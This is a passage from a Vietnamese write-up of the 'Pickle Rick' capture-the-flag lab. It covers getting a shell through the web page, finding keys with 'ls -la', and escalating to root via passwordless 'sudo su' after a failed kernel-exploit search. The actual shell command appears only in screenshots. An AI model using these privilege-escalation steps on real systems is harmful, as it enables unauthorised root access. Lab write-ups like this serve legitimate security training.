style='font-size:13.0pt;line-height:107%;font-family:"Calibri Light",sans-serif;
mso-fareast-font-family:"Calibri Light";background:yellow;mso-highlight:yellow'><span
style='mso-list:Ignore'>-<span style='font:7.0pt "Times New Roman"'>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
</span></span></span><![endif]><span style='font-size:13.0pt;line-height:107%;
font-family:"Calibri Light",sans-serif;mso-ascii-theme-font:major-latin;
mso-hansi-theme-font:major-latin;mso-bidi-theme-font:major-latin;background:
yellow;mso-highlight:yellow'>IP c&#7911;a máy kali: 10.4.43.108<o:p></o:p></span></p>
<p class=MsoNormal><span style='font-size:13.0pt;line-height:107%;font-family:
"Calibri Light",sans-serif;mso-ascii-theme-font:major-latin;mso-hansi-theme-font:
major-latin;mso-bidi-theme-font:major-latin'>Sau khi excute câu l&#7879;nh trên
web cùng v&#7899;i th&#7921;c hi&#7879;n l&#7855;ng nghe trên máy kali, k&#7871;t
qu&#7843; nh&#7853;n &#273;&#432;&#7907;c:<o:p></o:p></span></p>
<p class=MsoNormal align=center style='text-align:center'><span
style='font-size:13.0pt;line-height:107%;font-family:"Calibri Light",sans-serif;
mso-ascii-theme-font:major-latin;mso-hansi-theme-font:major-latin;mso-bidi-theme-font:
major-latin;mso-no-proof:yes'><!--[if gte vml 1]><v:shape id="Picture_x0020_2"
o:spid="_x0000_i1040" type="#_x0000_t75" alt="Text&#10;&#10;Description automatically generated"
style='width:325.8pt;height:89.4pt;visibility:visible;mso-wrap-style:square'>
<v:imagedata src="Khai%20thác%20Pickle%20Rick%20_files/image031.png" o:title="Text&#10;&#10;Description automatically generated"/>
</v:shape><![endif]--><![if !vml]><img border=0 width=434 height=119
src="Khai%20thác%20Pickle%20Rick%20_files/image032.png"
alt="Text&#10;&#10;Description automatically generated" v:shapes="Picture_x0020_2"><![endif]></span><span
style='font-size:13.0pt;line-height:107%;font-family:"Calibri Light",sans-serif;
mso-ascii-theme-font:major-latin;mso-hansi-theme-font:major-latin;mso-bidi-theme-font:
major-latin'><o:p></o:p></span></p>
<p class=MsoNormal style='text-align:justify'><span style='font-size:13.0pt;
line-height:107%;font-family:"Calibri Light",sans-serif;mso-ascii-theme-font:
major-latin;mso-hansi-theme-font:major-latin;mso-bidi-theme-font:major-latin;
background:lime;mso-highlight:lime'>Tìm key th&#7913; nh&#7845;t:</span><span
style='font-size:13.0pt;line-height:107%;font-family:"Calibri Light",sans-serif;
mso-ascii-theme-font:major-latin;mso-hansi-theme-font:major-latin;mso-bidi-theme-font:
major-latin'><o:p></o:p></span></p>
<p class=MsoNormal style='text-align:justify'><span style='font-size:13.0pt;
line-height:107%;font-family:"Calibri Light",sans-serif;mso-ascii-theme-font:
major-latin;mso-hansi-theme-font:major-latin;mso-bidi-theme-font:major-latin'>Sau
khi có k&#7871;t n&#7889;i r&#7891;i, dùng l&#7879;nh ki&#7875;m tra các t&#7853;p
tin/ th&#432; m&#7909;c &#273;ang hi&#7879;n hành nên dùng l&#7879;nh “ls -la”<o:p></o:p></span></p>
<p class=MsoNormal align=center style='text-align:center'><span
style='font-size:13.0pt;line-height:107%;font-family:"Calibri Light",sans-serif;
mso-ascii-theme-font:major-latin;mso-hansi-theme-font:major-latin;mso-bidi-theme-font:
major-latin;mso-no-proof:yes'><!--[if gte vml 1]><v:shape id="Picture_x0020_10"
o:spid="_x0000_i1039" type="#_x0000_t75" alt="Text&#10;&#10;Description automatically generated with medium confidence"
style='width:372.6pt;height:129pt;visibility:visible;mso-wrap-style:square'>
<v:imagedata src="Khai%20thác%20Pickle%20Rick%20_files/image033.png" o:title="Text&#10;&#10;Description automatically generated with medium confidence"/>
</v:shape><![endif]--><![if !vml]><img border=0 width=497 height=172
src="Khai%20thác%20Pickle%20Rick%20_files/image034.png"
alt="Text&#10;&#10;Description automatically generated with medium confidence"
v:shapes="Picture_x0020_10"><![endif]></span><span style='font-size:13.0pt;
line-height:107%;font-family:"Calibri Light",sans-serif;mso-ascii-theme-font:
major-latin;mso-hansi-theme-font:major-latin;mso-bidi-theme-font:major-latin'><o:p></o:p></span></p>
<p class=MsoNormal style='text-align:justify'><span style='font-size:13.0pt;
line-height:107%;font-family:"Calibri Light",sans-serif;mso-ascii-theme-font:
major-latin;mso-hansi-theme-font:major-latin;mso-bidi-theme-font:major-latin'>
m&#7897;t file d&#7841;ng txt kh&#7843; nghi, &#273;&#7885;c file &#273;ó =&gt;
key1: mr. meeseek hair<o:p></o:p></span></p>
<p class=MsoNormal style='text-align:justify'><span style='font-size:13.0pt;
line-height:107%;font-family:"Calibri Light",sans-serif;mso-ascii-theme-font:
major-latin;mso-hansi-theme-font:major-latin;mso-bidi-theme-font:major-latin;
background:lime;mso-highlight:lime'>Tìm key th&#7913; 2</span><span
style='font-size:13.0pt;line-height:107%;font-family:"Calibri Light",sans-serif;
mso-ascii-theme-font:major-latin;mso-hansi-theme-font:major-latin;mso-bidi-theme-font:
major-latin'><o:p></o:p></span></p>
<p class=MsoNormal style='text-align:justify'><span style='font-size:13.0pt;
line-height:107%;font-family:"Calibri Light",sans-serif;mso-ascii-theme-font:
major-latin;mso-hansi-theme-font:major-latin;mso-bidi-theme-font:major-latin'>&#272;&#7847;u
tiên di chuy&#7875;n ra th&#432; m&#7909;c root và li&#7879;t kê ra các
file/dir hi&#7879;n hành:<o:p></o:p></span></p>
<p class=MsoNormal style='text-align:justify'><span style='font-size:13.0pt;
line-height:107%;font-family:"Calibri Light",sans-serif;mso-ascii-theme-font:
major-latin;mso-hansi-theme-font:major-latin;mso-bidi-theme-font:major-latin;
mso-no-proof:yes'><!--[if gte vml 1]><v:shape id="Picture_x0020_11" o:spid="_x0000_i1038"
type="#_x0000_t75" alt="Text&#10;&#10;Description automatically generated"
style='width:468pt;height:277.8pt;visibility:visible;mso-wrap-style:square'>
<v:imagedata src="Khai%20thác%20Pickle%20Rick%20_files/image035.png" o:title="Text&#10;&#10;Description automatically generated"/>
</v:shape><![endif]--><![if !vml]><img border=0 width=624 height=370
src="Khai%20thác%20Pickle%20Rick%20_files/image036.png"
alt="Text&#10;&#10;Description automatically generated" v:shapes="Picture_x0020_11"><![endif]></span><span
style='font-size:13.0pt;line-height:107%;font-family:"Calibri Light",sans-serif;
mso-ascii-theme-font:major-latin;mso-hansi-theme-font:major-latin;mso-bidi-theme-font:
major-latin'><o:p></o:p></span></p>
<p class=MsoNormal style='text-align:justify'><b><span style='font-size:13.0pt;
line-height:107%;font-family:"Calibri Light",sans-serif;mso-ascii-theme-font:
major-latin;mso-hansi-theme-font:major-latin;mso-bidi-theme-font:major-latin'>Ki&#7871;n
th&#7913;c thu l&#7909;m &#273;&#432;&#7907;c:<o:p></o:p></span></b></p>
<p class=MsoNormal style='text-align:justify'><span style='font-size:13.0pt;
line-height:107%;font-family:"Calibri Light",sans-serif;mso-ascii-theme-font:
major-latin;mso-hansi-theme-font:major-latin;mso-bidi-theme-font:major-latin'>&#7902;
th&#7901;i &#273;i&#7875;m này, ch&#7881; c&#7847;n chú ý &#273;&#7871;n 3
directories &#273;ó là<o:p></o:p></span></p>
<p class=MsoListParagraphCxSpFirst style='text-align:justify;text-indent:-.25in;
mso-list:l7 level1 lfo4'><![if !supportLists]><span style='font-size:13.0pt;
line-height:107%;font-family:Symbol;mso-fareast-font-family:Symbol;mso-bidi-font-family:
Symbol'><span style='mso-list:Ignore'>·<span style='font:7.0pt "Times New Roman"'>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
</span></span></span><![endif]><span style='font-size:13.0pt;line-height:107%;
font-family:"Calibri Light",sans-serif;mso-ascii-theme-font:major-latin;
mso-hansi-theme-font:major-latin;mso-bidi-theme-font:major-latin'>home:
N&#417;i ch&#7913;a nh&#7919;ng directories c&#7911;a nh&#7919;ng ng&#432;&#7901;i
dùng thông th&#432;&#7901;ng. Nh&#7919;ng ng&#432;&#7901;i dùng thông th&#432;&#7901;ng
s&#7869; &#273;&#432;&#7907;c phép truy c&#7853;p vào directory home này,
nh&#432;ng không &#273;&#432;&#7907;c phép thay &#273;&#7893;i nh&#7919;ng
directories (ví d&#7909; nh&#432; thêm ho&#7863;c xóa) &#273;&#432;&#7907;c ch&#7913;a
bên trong directory home.<o:p></o:p></span></p>
<p class=MsoListParagraphCxSpMiddle style='text-align:justify;text-indent:-.25in;
mso-list:l7 level1 lfo4'><![if !supportLists]><span style='font-size:13.0pt;
line-height:107%;font-family:Symbol;mso-fareast-font-family:Symbol;mso-bidi-font-family:
Symbol'><span style='mso-list:Ignore'>·<span style='font:7.0pt "Times New Roman"'>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
</span></span></span><![endif]><span style='font-size:13.0pt;line-height:107%;
font-family:"Calibri Light",sans-serif;mso-ascii-theme-font:major-latin;
mso-hansi-theme-font:major-latin;mso-bidi-theme-font:major-latin'>root:
Directory c&#7911;a root hay admin, ng&#432;&#7901;i có quy&#7873;n qu&#7843;n
tr&#7883; cao nh&#7845;t và ch&#7881; có root/admin m&#7899;i &#273;&#432;&#7907;c
quy&#7873;n truy c&#7853;p vào &#273;ây.<o:p></o:p></span></p>
<p class=MsoListParagraphCxSpLast style='text-align:justify;text-indent:-.25in;
mso-list:l7 level1 lfo4'><![if !supportLists]><span style='font-size:13.0pt;
line-height:107%;font-family:Symbol;mso-fareast-font-family:Symbol;mso-bidi-font-family:
Symbol'><span style='mso-list:Ignore'>·<span style='font:7.0pt "Times New Roman"'>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
</span></span></span><![endif]><span style='font-size:13.0pt;line-height:107%;
font-family:"Calibri Light",sans-serif;mso-ascii-theme-font:major-latin;
mso-hansi-theme-font:major-latin;mso-bidi-theme-font:major-latin'>tmp: &#273;ây
là directory th&#432;&#7901;ng &#273;&#432;&#7907;c dùng &#273;&#7875; l&#432;u
tr&#7919; nh&#7919;ng d&#7919; li&#7879;u t&#7841;m th&#7901;i, và &#273;&#432;&#7907;c
c&#7845;p quy&#7873;n truy c&#7853;p, s&#7917;a &#273;&#7893;i và th&#7921;c
thi cho t&#7845;t c&#7843; ng&#432;&#7901;i dùng h&#7879; th&#7889;ng (c&#7843;
root l&#7851;n ng&#432;&#7901;i dùng th&#432;&#7901;ng). Vì l&#7869;, directory
này r&#7845;t hay b&#7883; l&#7907;i d&#7909;ng làm n&#417;i chuy&#7875;n d&#7919;
li&#7879;u ho&#7863;c mã &#273;&#7897;c gi&#7919;a máy hacker và máy n&#7841;n
nhân. C&#361;ng nh&#432; hacker có th&#7875; ch&#7841;y file mã &#273;&#7897;c
ngay t&#7841;i directory tmp &#273;&#7875; t&#7845;n công h&#7879; th&#7889;ng.<o:p></o:p></span></p>
<p class=MsoNormal style='text-align:justify'><span style='font-size:13.0pt;
line-height:107%;font-family:"Calibri Light",sans-serif;mso-ascii-theme-font:
major-latin;mso-hansi-theme-font:major-latin;mso-bidi-theme-font:major-latin'>Di
chuy&#7875;n vào th&#432; m&#7909;c home, li&#7879;t kê các user:<o:p></o:p></span></p>
<p class=MsoNormal align=center style='text-align:center'><span
style='font-size:13.0pt;line-height:107%;font-family:"Calibri Light",sans-serif;
mso-ascii-theme-font:major-latin;mso-hansi-theme-font:major-latin;mso-bidi-theme-font:
major-latin;mso-no-proof:yes'><!--[if gte vml 1]><v:shape id="Picture_x0020_20"
o:spid="_x0000_i1037" type="#_x0000_t75" style='width:385.8pt;height:108.6pt;
visibility:visible;mso-wrap-style:square'>
<v:imagedata src="Khai%20thác%20Pickle%20Rick%20_files/image037.png" o:title=""/>
</v:shape><![endif]--><![if !vml]><img border=0 width=514 height=145
src="Khai%20thác%20Pickle%20Rick%20_files/image037.png" v:shapes="Picture_x0020_20"><![endif]></span><span
style='font-size:13.0pt;line-height:107%;font-family:"Calibri Light",sans-serif;
mso-ascii-theme-font:major-latin;mso-hansi-theme-font:major-latin;mso-bidi-theme-font:
major-latin'><o:p></o:p></span></p>
<p class=MsoNormal style='text-align:justify'><span style='font-size:13.0pt;
line-height:107%;font-family:"Calibri Light",sans-serif;mso-ascii-theme-font:
major-latin;mso-hansi-theme-font:major-latin;mso-bidi-theme-font:major-latin'>K&#7871;t
qu&#7843; tr&#7843; v&#7873; là có 2 ng&#432;&#7901;i dùng bình th&#432;&#7901;ng
là rick và ubuntu, và chúng ta có quy&#7873;n truy c&#7853;p vào c&#7843; 2
directories này. Th&#7871; t&#7841;i sao account www-data l&#7841;i không có &#7903;
&#273;ây? Vì account www-data là account m&#7863;c &#273;&#7883;nh &#273;&#432;&#7907;c
h&#7879; th&#7889;ng webserver (ví d&#7909; nh&#432; Apache ho&#7863;c Nginx,
v.v.) s&#7917; d&#7909;ng cho các tác v&#7909; th&#432;&#7901;ng ngày. &#272;ây
là m&#7897;t account bình th&#432;&#7901;ng và không có quy&#7873;n h&#7841;n
&#273;&#7863;c bi&#7879;t.<o:p></o:p></span></p>
<p class=MsoNormal style='text-align:justify'><span style='font-size:13.0pt;
line-height:107%;font-family:"Calibri Light",sans-serif;mso-ascii-theme-font:
major-latin;mso-hansi-theme-font:major-latin;mso-bidi-theme-font:major-latin'>Vào
trong user rick &#273;&#7875; tìm key th&#7913; 2<o:p></o:p></span></p>
<p class=MsoNormal align=center style='text-align:center'><span
style='font-size:13.0pt;line-height:107%;font-family:"Calibri Light",sans-serif;
mso-ascii-theme-font:major-latin;mso-hansi-theme-font:major-latin;mso-bidi-theme-font:
major-latin;mso-no-proof:yes'><!--[if gte vml 1]><v:shape id="Picture_x0020_21"
o:spid="_x0000_i1036" type="#_x0000_t75" alt="Text&#10;&#10;Description automatically generated"
style='width:349.2pt;height:100.2pt;visibility:visible;mso-wrap-style:square'>
<v:imagedata src="Khai%20thác%20Pickle%20Rick%20_files/image038.png" o:title="Text&#10;&#10;Description automatically generated"/>
</v:shape><![endif]--><![if !vml]><img border=0 width=466 height=134
src="Khai%20thác%20Pickle%20Rick%20_files/image039.png"
alt="Text&#10;&#10;Description automatically generated" v:shapes="Picture_x0020_21"><![endif]></span><span
style='font-size:13.0pt;line-height:107%;font-family:"Calibri Light",sans-serif;
mso-ascii-theme-font:major-latin;mso-hansi-theme-font:major-latin;mso-bidi-theme-font:
major-latin'><o:p></o:p></span></p>
<p class=MsoNormal style='text-align:justify'><span style='font-size:13.0pt;
line-height:107%;font-family:"Calibri Light",sans-serif;mso-ascii-theme-font:
major-latin;mso-hansi-theme-font:major-latin;mso-bidi-theme-font:major-latin;
background:lime;mso-highlight:lime'>Tìm key th&#7913; 3</span><span
style='font-size:13.0pt;line-height:107%;font-family:"Calibri Light",sans-serif;
mso-ascii-theme-font:major-latin;mso-hansi-theme-font:major-latin;mso-bidi-theme-font:
major-latin'><o:p></o:p></span></p>
<p class=MsoNormal style='text-align:justify'><span style='font-size:13.0pt;
line-height:107%;font-family:"Calibri Light",sans-serif;mso-ascii-theme-font:
major-latin;mso-hansi-theme-font:major-latin;mso-bidi-theme-font:major-latin'>Lúc
này chuy&#7875;n qua user còn l&#7841;i trong th&#432; m&#7909;c home &#273;&#7875;
tìm. &#7902; &#273;ây chúng ta có 2 file &#273;&#7875; chú ý là
.sudo_as_admin_successful và .ssh. Nh&#432;ng .sudo_as_admin_successful có s&#7889;
byte d&#7919; li&#7879;u b&#7857;ng 0 nên &#273;ây là m&#7897;t file tr&#7889;ng.
Còn directory .ssh không cho chúng ta quy&#7873;n truy c&#7853;p. Có th&#7875;
th&#7917; cd &#273;&#7871;n .ssh s&#7869; nh&#7853;n &#273;&#432;&#7907;c báo l&#7895;i
sau<o:p></o:p></span></p>
<p class=MsoNormal align=center style='text-align:center'><span
style='font-size:13.0pt;line-height:107%;font-family:"Calibri Light",sans-serif;
mso-ascii-theme-font:major-latin;mso-hansi-theme-font:major-latin;mso-bidi-theme-font:
major-latin;mso-no-proof:yes'><!--[if gte vml 1]><v:shape id="Picture_x0020_22"
o:spid="_x0000_i1035" type="#_x0000_t75" alt="Text&#10;&#10;Description automatically generated"
style='width:382.2pt;height:176.4pt;visibility:visible;mso-wrap-style:square'>
<v:imagedata src="Khai%20thác%20Pickle%20Rick%20_files/image040.png" o:title="Text&#10;&#10;Description automatically generated"/>
</v:shape><![endif]--><![if !vml]><img border=0 width=510 height=235
src="Khai%20thác%20Pickle%20Rick%20_files/image041.png"
alt="Text&#10;&#10;Description automatically generated" v:shapes="Picture_x0020_22"><![endif]></span><span
style='font-size:13.0pt;line-height:107%;font-family:"Calibri Light",sans-serif;
mso-ascii-theme-font:major-latin;mso-hansi-theme-font:major-latin;mso-bidi-theme-font:
major-latin'><o:p></o:p></span></p>
<p class=MsoNormal style='text-align:justify'><span style='font-size:13.0pt;
line-height:107%;font-family:"Calibri Light",sans-serif;mso-ascii-theme-font:
major-latin;mso-hansi-theme-font:major-latin;mso-bidi-theme-font:major-latin'>Do
&#273;ó c&#7847;n ph&#7843;i leo thang &#273;&#7863;c quy&#7873;n &#273;&#7875;
có th&#7875; truy c&#7853;p &#273;&#432;&#7907;c trong dir này. Privileges
escalation là m&#7897;t l&#297;nh v&#7921;c khá r&#7897;ng và có vô s&#7889;
cách c&#361;ng nh&#432; k&#7929; thu&#7853;t &#273;&#7875; th&#7921;c hi&#7879;n.
Trong &#273;ó có 2 cách ph&#7893; bi&#7871;n nh&#7845;t &#273;ó là s&#7917; d&#7909;ng:<o:p></o:p></span></p>
<p class=MsoListParagraphCxSpFirst style='text-align:justify;text-indent:-.25in;
mso-list:l2 level1 lfo5'><![if !supportLists]><span style='font-size:13.0pt;
line-height:107%;font-family:Symbol;mso-fareast-font-family:Symbol;mso-bidi-font-family:
Symbol'><span style='mso-list:Ignore'>·<span style='font:7.0pt "Times New Roman"'>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
</span></span></span><![endif]><span style='font-size:13.0pt;line-height:107%;
font-family:"Calibri Light",sans-serif;mso-ascii-theme-font:major-latin;
mso-hansi-theme-font:major-latin;mso-bidi-theme-font:major-latin'>Kernal
exploit: Ngh&#297;a là l&#7907;i d&#7909;ng nh&#7919;ng l&#7895; h&#7893;ng b&#7843;o
m&#7853;t n&#7857;m trong nhân Linux ho&#7863;c h&#7879; &#273;i&#7873;u hành
Ubuntu &#273;&#7875; ti&#7871;n hành nâng quy&#7873;n qu&#7843;n tr&#7883;.<o:p></o:p></span></p>
<p class=MsoListParagraphCxSpLast style='text-align:justify;text-indent:-.25in;
mso-list:l2 level1 lfo5'><![if !supportLists]><span style='font-size:13.0pt;
line-height:107%;font-family:Symbol;mso-fareast-font-family:Symbol;mso-bidi-font-family:
Symbol'><span style='mso-list:Ignore'>·<span style='font:7.0pt "Times New Roman"'>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
</span></span></span><![endif]><span style='font-size:13.0pt;line-height:107%;
font-family:"Calibri Light",sans-serif;mso-ascii-theme-font:major-latin;
mso-hansi-theme-font:major-latin;mso-bidi-theme-font:major-latin'>Sudo rights:
L&#7907;i d&#7909;ng các công c&#7909; &#273;&#432;&#7907;c c&#7845;p quy&#7873;n
s&#7917; d&#7909;ng &#273;&#7875; nâng quy&#7873;n qu&#7843;n tr&#7883;.<o:p></o:p></span></p>
<p class=MsoNormal style='text-align:justify'><span style='font-size:13.0pt;
line-height:107%;font-family:"Calibri Light",sans-serif;mso-ascii-theme-font:
major-latin;mso-hansi-theme-font:major-latin;mso-bidi-theme-font:major-latin'>&#272;&#7847;u
tiên b&#7855;t &#273;&#7847;u v&#7899;i Kernal exploit, c&#7847;n ph&#7843;i
thu th&#7853;p thông tin liên quan &#273;&#7871;n OS, kernel nh&#432; sau:<o:p></o:p></span></p>
<p class=MsoNormal align=center style='text-align:center'><span
style='font-size:13.0pt;line-height:107%;font-family:"Calibri Light",sans-serif;
mso-ascii-theme-font:major-latin;mso-hansi-theme-font:major-latin;mso-bidi-theme-font:
major-latin;mso-no-proof:yes'><!--[if gte vml 1]><v:shape id="Picture_x0020_23"
o:spid="_x0000_i1034" type="#_x0000_t75" alt="A black screen with white text&#10;&#10;Description automatically generated with low confidence"
style='width:5in;height:213.6pt;visibility:visible;mso-wrap-style:square'>
<v:imagedata src="Khai%20thác%20Pickle%20Rick%20_files/image042.png" o:title="A black screen with white text&#10;&#10;Description automatically generated with low confidence"/>
</v:shape><![endif]--><![if !vml]><img border=0 width=480 height=285
src="Khai%20thác%20Pickle%20Rick%20_files/image042.png"
alt="A black screen with white text&#10;&#10;Description automatically generated with low confidence"
v:shapes="Picture_x0020_23"><![endif]></span><span style='font-size:13.0pt;
line-height:107%;font-family:"Calibri Light",sans-serif;mso-ascii-theme-font:
major-latin;mso-hansi-theme-font:major-latin;mso-bidi-theme-font:major-latin'><o:p></o:p></span></p>
<p class=MsoNormal align=center style='text-align:center'><span
style='font-size:13.0pt;line-height:107%;font-family:"Calibri Light",sans-serif;
mso-ascii-theme-font:major-latin;mso-hansi-theme-font:major-latin;mso-bidi-theme-font:
major-latin;mso-no-proof:yes'><!--[if gte vml 1]><v:shape id="Picture_x0020_24"
o:spid="_x0000_i1033" type="#_x0000_t75" style='width:468pt;height:34.8pt;
visibility:visible;mso-wrap-style:square'>
<v:imagedata src="Khai%20thác%20Pickle%20Rick%20_files/image043.png" o:title=""/>
</v:shape><![endif]--><![if !vml]><img border=0 width=624 height=46
src="Khai%20thác%20Pickle%20Rick%20_files/image044.png" v:shapes="Picture_x0020_24"><![endif]></span><span
style='font-size:13.0pt;line-height:107%;font-family:"Calibri Light",sans-serif;
mso-ascii-theme-font:major-latin;mso-hansi-theme-font:major-latin;mso-bidi-theme-font:
major-latin'><o:p></o:p></span></p>
<p class=MsoNormal style='text-align:justify'><span style='font-size:13.0pt;
line-height:107%;font-family:"Calibri Light",sans-serif;mso-ascii-theme-font:
major-latin;mso-hansi-theme-font:major-latin;mso-bidi-theme-font:major-latin'>K&#7871;t
h&#7907;p các &#273;i&#7873;u trên có ngh&#297;a là chúng ta c&#7847;n tìm m&#7897;t
ph&#7847;n m&#7873;m khai thác l&#7895;i cho phép nâng c&#7845;p quy&#7873;n qu&#7843;n
tr&#7883; trên Ubuntu 16.04.5 LTS ho&#7863;c Kernel 4.4.0-1072-aws &#273;&#432;&#7907;c
vi&#7871;t b&#7857;ng Bash, Perl, C ho&#7863;c có &#273;uôi .elf (file th&#7921;c
thi trên Linux).<o:p></o:p></span></p>
<p class=MsoNormal style='text-align:justify'><span style='font-size:13.0pt;
line-height:107%;font-family:"Calibri Light",sans-serif;mso-ascii-theme-font:
major-latin;mso-hansi-theme-font:major-latin;mso-bidi-theme-font:major-latin'>Ti&#7871;n
hành tìm l&#7895;i nh&#7919;ng không m&#7845;y kh&#7843; quan<o:p></o:p></span></p>
<p class=MsoNormal align=center style='text-align:center'><span
style='font-size:13.0pt;line-height:107%;font-family:"Calibri Light",sans-serif;
mso-ascii-theme-font:major-latin;mso-hansi-theme-font:major-latin;mso-bidi-theme-font:
major-latin;mso-no-proof:yes'><!--[if gte vml 1]><v:shape id="Picture_x0020_25"
o:spid="_x0000_i1032" type="#_x0000_t75" style='width:288.6pt;height:118.2pt;
visibility:visible;mso-wrap-style:square'>
<v:imagedata src="Khai%20thác%20Pickle%20Rick%20_files/image045.png" o:title=""/>
</v:shape><![endif]--><![if !vml]><img border=0 width=385 height=158
src="Khai%20thác%20Pickle%20Rick%20_files/image046.png" v:shapes="Picture_x0020_25"><![endif]></span><span
style='font-size:13.0pt;line-height:107%;font-family:"Calibri Light",sans-serif;
mso-ascii-theme-font:major-latin;mso-hansi-theme-font:major-latin;mso-bidi-theme-font:
major-latin'><o:p></o:p></span></p>
<p class=MsoNormal style='text-align:justify'><span style='font-size:13.0pt;
line-height:107%;font-family:"Calibri Light",sans-serif;mso-ascii-theme-font:
major-latin;mso-hansi-theme-font:major-latin;mso-bidi-theme-font:major-latin'>K&#7871;t
qu&#7843; không m&#7845;y kh&#7843; quan nên s&#7869; chuy&#7875;n qua cách
nâng c&#7845;p &#273;&#7863;c quy&#7873;n th&#7913; 2 là sudo right. <o:p></o:p></span></p>
<p class=MsoNormal style='text-align:justify'><b><span style='font-size:13.0pt;
line-height:107%;font-family:"Calibri Light",sans-serif;mso-ascii-theme-font:
major-latin;mso-hansi-theme-font:major-latin;mso-bidi-theme-font:major-latin'>Ki&#7871;n
th&#7913;c:</span></b><span style='font-size:13.0pt;line-height:107%;
font-family:"Calibri Light",sans-serif;mso-ascii-theme-font:major-latin;
mso-hansi-theme-font:major-latin;mso-bidi-theme-font:major-latin'><span
style='mso-spacerun:yes'>  </span>t&#7845;t c&#7843; m&#7885;i th&#7913; t&#7915;
thi&#7871;t b&#7883;, công c&#7909;, câu l&#7879;nh, interface, ip address,
port, v.v trên Linux &#273;&#7873;u là m&#7897;t file. Do &#273;ó, vi&#7879;c b&#7841;n
có th&#7875; s&#7917; d&#7909;ng m&#7897;t công c&#7909; ví d&#7909; Perl hay m&#7897;t
dòng l&#7879;nh ví d&#7909; ls &#273;&#432;&#7907;c hay không ph&#7909; thu&#7897;c
hoàn toàn vào vi&#7879;c b&#7841;n có quy&#7873;n ti&#7871;p c&#7853;n, và th&#7921;c
thi v&#7899;i file Perl ho&#7863;c file ls hay không. M&#7895;i account trong h&#7879;
th&#7889;ng Linux th&#432;&#7901;ng s&#7869; &#273;&#432;&#7907;c c&#7845;p
phép s&#7917; d&#7909;ng m&#7897;t s&#7889; công c&#7909; ho&#7863;c câu l&#7879;nh
&#273;&#7875; th&#7921;c hi&#7879;n công vi&#7879;c c&#7911;a h&#7885;. Và các
công c&#7909; ho&#7863;c câu l&#7879;nh này n&#7871;u không &#273;&#432;&#7907;c
qu&#7843;n tr&#7883; k&#7929;, chúng hoàn toàn có th&#7875; b&#7883; l&#7907;i
d&#7909;ng &#273;&#7875; nâng c&#7845;p lên quy&#7873;n qu&#7843;n tr&#7883;
cao h&#417;n, ho&#7863;c th&#7853;m chí là quy&#7873;n qu&#7843;n tr&#7883;
root.<o:p></o:p></span></p>
<p class=MsoNormal style='text-align:justify'><span style='font-size:13.0pt;
line-height:107%;font-family:"Calibri Light",sans-serif;mso-ascii-theme-font:
major-latin;mso-hansi-theme-font:major-latin;mso-bidi-theme-font:major-latin'>Do
&#273;ó, c&#7847;n ki&#7875;m tra quy&#7873;n c&#7911;a account hi&#7879;n t&#7841;i:<o:p></o:p></span></p>
<p class=MsoNormal style='text-align:justify'><span style='font-size:13.0pt;
line-height:107%;font-family:"Calibri Light",sans-serif;mso-ascii-theme-font:
major-latin;mso-hansi-theme-font:major-latin;mso-bidi-theme-font:major-latin;
mso-no-proof:yes'><!--[if gte vml 1]><v:shape id="Picture_x0020_26" o:spid="_x0000_i1031"
type="#_x0000_t75" alt="Text&#10;&#10;Description automatically generated"
style='width:468pt;height:135pt;visibility:visible;mso-wrap-style:square'>
<v:imagedata src="Khai%20thác%20Pickle%20Rick%20_files/image047.png" o:title="Text&#10;&#10;Description automatically generated"/>
</v:shape><![endif]--><![if !vml]><img border=0 width=624 height=180
src="Khai%20thác%20Pickle%20Rick%20_files/image048.png"
alt="Text&#10;&#10;Description automatically generated" v:shapes="Picture_x0020_26"><![endif]></span><span
style='font-size:13.0pt;line-height:107%;font-family:"Calibri Light",sans-serif;
mso-ascii-theme-font:major-latin;mso-hansi-theme-font:major-latin;mso-bidi-theme-font:
major-latin'><o:p></o:p></span></p>
<p class=MsoNormal style='text-align:justify'><span style='font-size:13.0pt;
line-height:107%;font-family:"Calibri Light",sans-serif;mso-ascii-theme-font:
major-latin;mso-hansi-theme-font:major-latin;mso-bidi-theme-font:major-latin'>D&#7921;a
vào k&#7871;t qu&#7843; trên chúng ta có th&#7875; th&#7845;y, account c&#7911;a
chúng ta có quy&#7873;n s&#7917; d&#7909;ng b&#7845;t k&#7923; công c&#7909;
câu l&#7879;nh nào &#273;ang có trên server Pickle Rick mà không c&#7847;n ph&#7843;i
cung c&#7845;p password c&#7911;a account hi&#7879;n t&#7841;i ho&#7863;c
password c&#7911;a account root.<o:p></o:p></span></p>
<p class=MsoNormal style='text-align:justify'><span style='font-size:13.0pt;
line-height:107%;font-family:"Calibri Light",sans-serif;mso-ascii-theme-font:
major-latin;mso-hansi-theme-font:major-latin;mso-bidi-theme-font:major-latin'>Do
không yêu c&#7847;u v&#7873; password nên s&#7917; d&#7909;ng câu l&#7879;nh
“sudo su” &#273;&#7875; nâng c&#7845;p &#273;&#7863;c quy&#7873;n lên root
luôn.<o:p></o:p></span></p>
<p class=MsoNormal align=center style='text-align:center'><span
style='font-size:13.0pt;line-height:107%;font-family:"Calibri Light",sans-serif;
mso-ascii-theme-font:major-latin;mso-hansi-theme-font:major-latin;mso-bidi-theme-font:
major-latin;mso-no-proof:yes'><!--[if gte vml 1]><v:shape id="Picture_x0020_27"
o:spid="_x0000_i1030" type="#_x0000_t75" alt="Text&#10;&#10;Description automatically generated"
style='width:114.6pt;height:58.8pt;visibility:visible;mso-wrap-style:square'>
<v:imagedata src="Khai%20thác%20Pickle%20Rick%20_files/image049.png" o:title="Text&#10;&#10;Description automatically generated"/>
</v:shape><![endif]--><![if !vml]><img border=0 width=153 height=78
src="Khai%20thác%20Pickle%20Rick%20_files/image049.png"
alt="Text&#10;&#10;Description automatically generated" v:shapes="Picture_x0020_27"><![endif]></span><span
style='font-size:13.0pt;line-height:107%;font-family:"Calibri Light",sans-serif;
mso-ascii-theme-font:major-latin;mso-hansi-theme-font:major-latin;mso-bidi-theme-font:
major-latin'><o:p></o:p></span></p>
<p class=MsoNormal style='text-align:justify'><span style='font-size:13.0pt;
line-height:107%;font-family:"Calibri Light",sans-serif;mso-ascii-theme-font:
major-latin;mso-hansi-theme-font:major-latin;mso-bidi-theme-font:major-latin'>Lúc
